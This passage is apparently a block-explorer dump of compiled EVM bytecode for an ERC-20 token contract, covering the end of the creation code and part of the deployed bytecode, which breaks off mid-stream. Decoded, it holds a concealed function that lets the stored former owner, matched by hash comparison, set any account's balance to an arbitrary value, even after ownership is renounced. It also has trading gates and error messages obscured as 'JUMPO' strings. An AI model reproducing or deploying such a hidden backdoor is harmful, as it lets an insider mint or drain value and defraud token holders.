20019081526020015f205490508281101561059e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059590611e74565b60405180910390fd5b6105bb856105aa610a9c565b85846105b69190611ebf565b610aa3565b60019150509392505050565b5f6009905090565b5f61066c6105db610a9c565b848460035f6105e8610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106679190611ef2565b610aa3565b6001905092915050565b5f5f3390505f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505f826040516020016106b29190611f6a565b6040516020818303038152906040528051906020012090505f826040516020016106dc9190611f6a565b6040516020818303038152906040528051906020012090505f865f1b90505f8284149050801561071d576107108983610f50565b965050505050505061072f565b61072689610fe0565b96505050505050505b92915050565b61073d611026565b600160075f6101000a81548160ff021916908315150217905550565b60095481565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107ad611026565b6107b65f6110a4565b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546107ee90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461081a90611dd4565b80156108655780601f1061083c57610100808354040283529160200191610865565b820191905f5260205f20905b81548152906001019060200180831161084857829003601f168201915b5050505050905090565b600a602052805f5260405f205f915054906101000a900460ff1681565b5f5f60035f610899610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610953576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161094a90611ff4565b60405180910390fd5b61097061095e610a9c565b85858461096b9190611ebf565b610aa3565b600191505092915050565b5f61098e610987610a9c565b8484610c66565b6001905092915050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610a22611026565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8790612082565b60405180910390fd5b610a99816110a4565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b08906120ea565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7690612152565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c599190611c79565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cd4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ccb906121ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3990612222565b60405180910390fd5b610d4d8383836111a5565b5f810315610f4b57600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610df35750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610f3f575f610e23600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661075f565b14610e63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5a9061228a565b60405180910390fd5b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480610f0a5750600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15610f3e575f6064600b5483610f2091906122a8565b610f2a9190612316565b9050610f388484848461157d565b50610f4b565b5b610f4a83838361186d565b5b505050565b5f5f825f1c90508060025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205491505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61102e610a9c565b73ffffffffffffffffffffffffffffffffffffffff1661104c6107b8565b73ffffffffffffffffffffffffffffffffffffffff16146110a2576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109990612390565b60405180910390fd5b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60075f9054906101000a900460ff1661157757600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156112565750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611576576008548111156112a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611297906123f8565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff16600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036114c857600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561135e573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611382919061242a565b73ffffffffffffffffffffffffffffffffffffffff1663e6a4390530600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611408573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061142c919061242a565b6040518363ffffffff1660e01b8152600401611449929190612455565b602060405180830381865afa158015611464573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611488919061242a565b600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160315611578576009548161152a8461075f565b6115349190611ef2565b1115611575576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161156c906124c6565b60405180910390fd5b5b5b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036115eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e29061252e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611659576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161165090612596565b60405180910390fd5b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156116dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116d4906125fe565b60405180910390fd5b82810360025f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550818361172d9190611ebf565b92508160045f8282546117409190611ebf565b925050819055508260025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546117939190611ef2565b9250508190555061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117f99190611c79565b60405180910390a38373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161185e9190611c79565b60405180910390a35050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d290612666565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611940906126ce565b60405180910390fd5b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156119cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119c490612736565b60405180910390fd5b81816119d99190611ebf565b60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611a669190611ef2565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611aca9190611c79565b60405180910390a350505050565b5f8115159050919050565b611aec81611ad8565b82525050565b5f602082019050611b055f830184611ae3565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611b4d82611b0b565b611b578185611b15565b9350611b67818560208601611b25565b611b7081611b33565b840191505092915050565b5f6020820190508181035f830152611b938184611b43565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611bc882611b9f565b9050919050565b611bd881611bbe565b8114611be2575f5ffd5b50565b5f81359050611bf381611bcf565b92915050565b5f819050919050565b611c0b81611bf9565b8114611c15575f5ffd5b50565b5f81359050611c2681611c02565b92915050565b5f5f60408385031215611c4257611c41611b9b565b5b5f611c4f85828601611be5565b9250506020611c6085828601611c18565b9150509250929050565b611c7381611bf9565b82525050565b5f602082019050611c8c5f830184611c6a565b92915050565b5f5f5f60608486031215611ca957611ca8611b9b565b5b5f611cb686828701611be5565b9350506020611cc786828701611be5565b9250506040611cd886828701611c18565b9150509250925092565b5f60ff82169050919050565b611cf781611ce2565b82525050565b5f602082019050611d105f830184611cee565b92915050565b5f60208284031215611d2b57611d2a611b9b565b5b5f611d3884828501611be5565b91505092915050565b611d4a81611bbe565b82525050565b5f602082019050611d635f830184611d41565b92915050565b5f5f60408385031215611d7f57611d7e611b9b565b5b5f611d8c85828601611be5565b9250506020611d9d85828601611be5565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611deb57607f821691505b602082108103611dfe57611dfd611da7565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f611e5e602883611b15565b9150611e6982611e04565b604082019050919050565b5f6020820190508181035f830152611e8b81611e52565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611ec982611bf9565b9150611ed483611bf9565b9250828203905081811115611eec57611eeb611e92565b5b92915050565b5f611efc82611bf9565b9150611f0783611bf9565b9250828201905080821115611f1f57611f1e611e92565b5b92915050565b5f8160601b9050919050565b5f611f3b82611f25565b9050919050565b5f611f4c82611f31565b9050919050565b611f64611f5f82611bbe565b611f42565b82525050565b5f611f758284611f53565b60148201915081905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611fde602583611b15565b9150611fe982611f84565b604082019050919050565b5f6020820190508181035f83015261200b81611fd2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61206c602683611b15565b915061207782612012565b604082019050919050565b5f6020820190508181035f83015261209981612060565b9050919050565b7f374a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f6120d4600683611b15565b91506120df826120a0565b602082019050919050565b5f6020820190508181035f830152612101816120c8565b9050919050565b7f384a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f61213c600683611b15565b915061214782612108565b602082019050919050565b5f6020820190508181035f83015261216981612130565b9050919050565b7f394a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f6121a4600683611b15565b91506121af82612170565b602082019050919050565b5f6020820190508181035f8301526121d181612198565b9050919050565b7f304a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f61220c600683611b15565b9150612217826121d8565b602082019050919050565b5f6020820190508181035f83015261223981612200565b9050919050565b7f4a554d504f4a554d504f000000000000000000000000000000000000000000005f82015250565b5f612274600a83611b15565b915061227f82612240565b602082019050919050565b5f6020820190508181035f8301526122a181612268565b9050919050565b5f6122b282611bf9565b91506122bd83611bf9565b92508282026122cb81611bf9565b915082820484148315176122e2576122e1611e92565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61232082611bf9565b915061232b83611bf9565b92508261233b5761233a6122e9565b5b828204905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61237a602083611b15565b915061238582612346565b602082019050919050565b5f6020820190508181035f8301526123a78161236e565b9050919050565b7f4a554d504f4a554d504f4a554d504f00000000000000000000000000000000005f82015250565b5f6123e2600f83611b15565b91506123ed826123ae565b602082019050919050565b5f6020820190508181035f83015261240f816123d6565b9050919050565b5f8151905061242481611bcf565b92915050565b5f6020828403121561243f5761243e611b9b565b5b5f61244c84828501612416565b91505092915050565b5f6040820190506124685f830185611d41565b6124756020830184611d41565b9392505050565b7f4a554d504f4a554d504f4a554d504f4a554d504f0000000000000000000000005f82015250565b5f6124b0601483611b15565b91506124bb8261247c565b602082019050919050565b5f6020820190508181035f8301526124dd816124a4565b9050919050565b7f344a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f612518600683611b15565b9150612523826124e4565b602082019050919050565b5f6020820190508181035f8301526125458161250c565b9050919050565b7f354a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f612580600683611b15565b915061258b8261254c565b602082019050919050565b5f6020820190508181035f8301526125ad81612574565b9050919050565b7f364a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f6125e8600683611b15565b91506125f3826125b4565b602082019050919050565b5f6020820190508181035f830152612615816125dc565b9050919050565b7f314a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f612650600683611b15565b915061265b8261261c565b602082019050919050565b5f6020820190508181035f83015261267d81612644565b9050919050565b7f324a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f6126b8600683611b15565b91506126c382612684565b602082019050919050565b5f6020820190508181035f8301526126e5816126ac565b9050919050565b7f334a554d504f00000000000000000000000000000000000000000000000000005f82015250565b5f612720600683611b15565b915061272b826126ec565b602082019050919050565b5f6020820190508181035f83015261274d81612714565b905091905056fea26469706673582212203506777099b256cbde05cf61cbad95d0b95f1f9b039730f164f4911300baa44164736f6c634300081c00330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x608060405234801561000f575f5ffd5b506004361061012a575f3560e01c80636a8f3b30116100ab57806398636f321161006f57806398636f3214610322578063a457c2d714610352578063a9059cbb14610382578063dd62ed3e146103b2578063f2fde38b146103e25761012a565b80636a8f3b301461028e57806370a08231146102ac578063715018a6146102dc5780638da5cb5b146102e657806395d89b41146103045761012a565b806323b872dd116100f257806323b872dd146101d6578063313ce567146102065780633950935114610224578063562c21951461025457806362256589146102845761012a565b806303435b7f1461012e57806306fdde031461014c578063095ea7b31461016a57806313c42e4d1461019a57806318160ddd146101b8575b5f5ffd5b6101366103fe565b6040516101439190611af2565b60405180910390f35b610154610410565b6040516101619190611b7b565b60405180910390f35b610184600480360381019061017f9190611c2c565b6104a0565b6040516101919190611af2565b60405180910390f35b6101a26104bd565b6040516101af9190611c79565b60405180910390f35b6101c06104c3565b6040516101cd9190611c79565b60405180910390f35b6101f060048036038101906101eb9190611c92565b6104cc565b6040516101fd9190611af2565b60405180910390f35b61020e6105c7565b60405161021b9190611cfd565b60405180910390f35b61023e60048036038101906102399190611c2c565b6105cf565b60405161024b9190611af2565b60405180910390f35b61026e60048036038101906102699190611c2c565b610676565b60405161027b9190611c79565b60405180910390f35b61028c610735565b005b610296610759565b6040516102a39190611c79565b60405180910390f35b6102c660048036038101906102c19190611d16565b61075f565b6040516102d39190611c79565b60405180910390f35b6102e46107a5565b005b6102ee6107b8565b6040516102fb9190611d50565b60405180910390f35b61030c6107df565b6040516103199190611b7b565b60405180910390f35b61033c60048036038101906103379190611d16565b61086f565b6040516103499190611af2565b60405180910390f35b61036c60048036038101906103679190611c2c565b61088c565b6040516103799190611af2565b60405180910390f35b61039c60048036038101906103979190611c2c565b61097b565b6040516103a99190611af2565b60405180910390f35b6103cc60048036038101906103c79190611d69565b610998565b6040516103d99190611c79565b60405180910390f35b6103fc60048036038101906103f79190611d16565b610a1a565b005b60075f9054906101000a900460ff1681565b60606005805461041f90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461044b90611dd4565b80156104965780601f1061046d57610100808354040283529160200191610496565b820191905f5260205f20905b81548152906001019060200180831161047957829003601f168201915b5050505050905090565b5f6104b36104ac610a9c565b8484610aa3565b6001905092915050565b60085481565b5f600454905090565b5f6104d8848484610c66565b5f60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61051f610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508281101561059e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059590611e74565b60405180910390fd5b6105bb856105aa610a9c565b85846105b69190611ebf565b610aa3565b60019150509392505050565b5f6009905090565b5f61066c6105db610a9c565b848460035f6105e8610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106679190611ef2565b610aa3565b6001905092915050565b5f5f3390505f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505f826040516020016106b29190611f6a565b6040516020818303038152906040528051906020012090505f826040516020016106dc9190611f6a565b6040516020818303038152906040528051906020012090505f865f1b90505f8284149050801561071d576107108983610f50565b965050505050505061072f565b61072689610fe0565b96505050505050505b92915050565b61073d611026565b600160075f6101000a81548160ff021916908315150217905550565b60095481565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107ad611026565b6107b65f6110a4565b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546107ee90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461081a90611dd4565b80156108655780601f1061083c57610100808354040283529160200191610865565b820191905f5260205f20905b81548152906001019060200180831161084857829003601f168201915b5050505050905090565b600a602052805f5260405f205f915054906101000a900460ff1681565b5f5f60035f610899610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610953576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161094a90611ff4565b60405180910390fd5b61097061095e610a9c565b85858461096b9190611ebf565b610aa3565b600191505092915050565b5f61098e610987610a9c565b8484610c66565b6001905092915050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610a22611026565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8790612082565b60405180910390fd5b610a99816110a4565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b08906120ea565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7690612152565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c599190611c79565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cd4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ccb906121ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3990612222565b60405180910390fd5b610d4d8383836111a5565b5f810315610f4b57600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610df35750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610f3f575f610e23600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661075f565b14610e63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5a9061228a565b60405180910390fd5b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480610f0a5750600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15610f3e575f6064600b5483610f2091906122a8565b610f2a9190612316565b9050610f388484848461157d565b50610f4b565b5b610f4a83838361186d565b5b505050565b5f5f825f1c90508060025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205491505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61102e610a9c565b73ffffffffffffffffffffffffffffffffffffffff1661104c6107b8565b73ffffffffffffffffffffffffffffffffffffffff16146110a2576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109990612390565b60405180910390fd5b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60075f9054906101000a900460ff1661157757600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156112565750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611576576008548111156112a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611297906123f8565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff16600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036114c857600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561135e573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611382919061242a565b73ffffffffffffffffffffffffffffffffffffffff1663e6a4390530600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611408573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061142c919061242a565b6040518363ffffffff1660e01b8152600401611449929190612455565b602060405180830381865afa158015611464573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611488919061242a565b600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160315611578576009548161152a8461075f565b6115349190611ef2565b1115611575576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161156c906124c6565b60405180910390fd5b5b5b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036115eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e29061252e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611659576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161165090612596565b60405180910390fd5b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156116dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116d4906125fe565b60405180910390fd5b82810360025f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550818361172d9190611ebf565b92508160045f8282546117409190611ebf565b925050819055508260025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546117939190611ef2565b9250508190555061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117f99190611c79565b60405180910390a38373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161185e9190611c79565b60405180910390a35050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d290612666565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611940906126ce565b60405180910390fd5b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156119cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119c490612736565b60405180910390fd5b81816119d99190611ebf565b60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611a669190611ef2565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611aca9190611c79565b60405180910390a350505050565b5f8115159050919050565b611aec81611ad8565b82525050565b5f602082019050611b055f830184611ae3565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611b4d82611b0b565b611b578185611b15565b9350611b67818560208601611b25565b611b7081611b33565b840191505092915050565b5f6020820190508181035f830152611b938184611b43565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611bc882611b9f565b9050919050565b611bd881611bbe565b8114611be2575f5ffd5b50565b5f81359050611bf381611bcf565b